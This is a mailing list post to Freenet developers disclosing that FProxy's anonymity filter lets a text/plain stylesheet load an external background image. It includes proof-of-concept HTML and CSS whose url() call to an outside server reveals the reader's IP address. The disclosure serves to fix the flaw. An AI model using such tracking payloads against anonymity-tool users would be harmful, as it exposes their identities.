-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 After reading Cruft's short blurb about external CSS style sheets, I hacked around to see if FProxy would accept external style sheets.
Inserting the style sheets as *.css doesn't work, because FProxy doesn't recognise the content-type as safe and trips the anonymity filter. Inserting them as text/plain does work, though. In fact, it does work so well that one can specify an external background image in the stylesheet and FProxy doesn't warn the user. CSS-capable browsers will parse the stylesheet and fetch the background image from the WWW server, thus compromising the user's anonymity. I've inserted two keys to demonstrate this: freenet:KSK at css_web_bug.txt freenet:KSK at css_web_bug.html The demonstration will attempt to contact my site (http://nightwatch.mine.nu) for the external image. Here's the files in plaintext for those who don't want their ip to show up on my server logs: - --css_web_bug.html-- <html> <head> <title>Blah</title> <link rel="stylesheet" type="text/css" href="/KSK at css_web_bug.txt"> </head> <body> <h1>Foo</h1> Foo <h2>Bar</h2> </body> </html> - --css_web_bug.html-- - --css_web_bug.txt-- body { color: white; background: url(http://nightwatch.mine.nu/graphics/back.gif); } - --css_web_bug.txt-- - -- Mika Hirvonen <hirvox at welho.com> http://nightwatch.mine.nu -----BEGIN PGP SIGNATURE----- Version: 6.5.8ckt http://www.ipgpp.com/ iQA/AwUBPXGlIaSfrEHp33TBEQLQvgCgvmjs6HiUDEO87DH44M/GO530ZtAAn36O z7J7P9tR0eqvmMBtaFmwNrk4 =Hwju -----END PGP SIGNATURE----- _______________________________________________ devl mailing list devl at freenetproject.org http://hawk.freenetproject.org/cgi-bin/mailman/listinfo/devl
